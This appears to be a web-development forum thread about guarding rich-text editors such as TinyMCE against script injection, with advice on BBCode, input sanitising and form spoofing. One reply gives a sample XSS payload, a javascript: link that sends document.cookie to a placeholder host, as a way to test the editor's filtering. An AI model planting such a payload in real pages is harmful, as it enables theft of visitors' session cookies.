I was reading web security stuffs and found that user can inject malicious codes mostly JS in forms. Now, What about CKFinder/TinyMCE et al? They obviously produce html and any stripping will destroy the article formatting. bad enough they have a "code mode" where user can enter html directly.
Suppose my system is compromised (which is security thinking), what guards can I put to ensure minimum damage?
Thanks :)

They *should* not allow inserting javascript, but always, try your best at inserting things like

<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>

if this ends up in your site, and the editor didn't block it, something is wrong.

set your editors NOT to produce html, but some other, of the many kinds of enhanced text
like bbcode that is used to add [b]bold[/b] code highlighting and text effects in these forums, daniweb,
thats why alternate forms exist
the script handles the code and produces html, there is no chance of html injection

Member Avatar


Be aware that your forms can be spoofed. I could set up a form identical to yours on my server and send it to yours if I know the 'action' attribute value. Even if you try to hide it with ajax, I could find it by printing the js file. So, your protection will come from validating and sanitizing your incoming data. I never presume that POST data actually comes from my site. There are a few things you can try in order to detect an off-site post though, but I don't know how secure these are these days. $_SERVER, etc. It may be possible to spoof these too.

Thanks budddies, I found HTML purifier filter. Do anyone know how Strong it is? And How to set My editor to produce BBCode? and how do I convert BBCode to HTML so that I can display it in a browser?